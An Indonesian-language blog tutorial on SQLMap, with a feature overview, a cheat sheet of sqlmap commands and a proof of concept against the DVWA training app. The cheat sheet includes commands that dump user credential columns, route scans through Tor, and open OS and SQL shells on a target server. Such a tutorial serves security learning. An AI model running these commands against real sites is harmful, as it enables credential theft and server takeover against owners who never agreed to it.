SQLMap for SQL Injection

thumbnail

Introduction

SQLMap yaitu Automated Tool untuk mendeteksi dan mengeksploitasi kelemahan SQL Injection dan dilengkapi dengan berbagai fitur yang berguna.

Features

  1. Generic Features
    • Support MySQL,Oracle,PostgreSQL, dan berbagai DBMS lainnya.
    • Memungkinkan untuk Single Target URL, mendapatkan list target dari Requests Log Files pada Burp Proxy atau WebScarab Proxy, dan mendapatkan list target dengan menghubungkan SQLMap dan Google Dork yang akan men-query Google Search Engine dan menguraikan result page
    • Support Verbosity Messages Level hingga level 7.
  2. Fingerprint and Enumeration Features
    • Mendapatkan versi software back-end database dan fingerprint OS berdasarkan error messages, banner parsing, perbandingan fungsi output dan fitur spesifik.
    • Support untuk mengambil banner DBMS, Session user, dan informasi database terbaru. SQLMap juga memeriksa apakah session user itu administrator database atau bukan.
    • Support untuk otomatis dump seluruh skema database dan entri.
  3. Takeover Features
    • Support untuk execute arbitrary command dan retrieve output standar pada server database (MySQL,PostgreSQL,Microsoft SQL Server)
    • Support untuk download dan upload file dari server database

Cheat Sheet

  • Easy Scanning :
    sqlmap -u "http://testsite.com/login.php"
  • Scan menggunakan Tor :
    sqlmap -u "http://testsite.com/login.php" --tor --tor-type=SOCKS5
  • Scanning manual dengan set return time
    sqlmap -u "http://testsite.com/login.php" --time-sec 15
  • List database pada Situs
    sqlmap -u "http://testsite.com/login.php" --dbs
  • List table pada spesifik database
    sqlmap -u "http://testsite.com/login.php" -D site_db --tables
  • Dump content pada table
    sqlmap -u "http://testsite.com/login.php" -D site_db -T users –dump
  • List columns pada table
    sqlmap -u "http://testsite.com/login.php" -D site_db -T users --columns
  • Dump column tertentu
    sqlmap -u "http://testsite.com/login.php" -D site_db -T users -C username,password --dump
  • Dump table dari database saat ada admin credentials
    sqlmap -u "http://testsite.com/login.php" –method "POST" –data "username=admin&password=admin&submit2=Submit" -D social_mccodes -T users –dump
  • Get OS Shell
    sqlmap --dbms=mysql -u "http://testsite.com/login.php" --os-shell
  • Get SQL Shell
    sqlmap --dbms=mysql -u "http://testsite.com/login.php" --sql-shell

Proof of Concept

POC berikut dilakukan pada DVWA, Sebuah aplikasi berbasis web yang disediakan untuk membantu mempelajari cara exploit beberapa vulnerability dengan tingkatan dari low hingga impossible. Pada poc ini, tingkatan yang digunakan yaitu Low.

1. Akses DVWA pada web browser. Masukkan angka pada inputan User ID dan copy URL

2. Buka terminal dan akses SQLMap dengan command :
sqlmap -u '<URL Target>' --cookie="security=low; PHPSESSID=b45j18sshe2apgqjg9079htad3" --dbs

3. Cek tabel pada salah satu database dengan command :
sqlmap -u '<URL Target>' --cookie="security=low; PHPSESSID=b45j18sshe2apgqjg9079htad3" -D dvwa --tables

4. Cek columns pada salah satu tabel dengan command :
sqlmap -u '<URL Target>' --cookie="security=low; PHPSESSID=b45j18sshe2apgqjg9079htad3" -D dvwa -T users --columns

Reference

One thought on “SQLMap for SQL Injection

Leave a Reply

Your email address will not be published. Required fields are marked *

Back To Top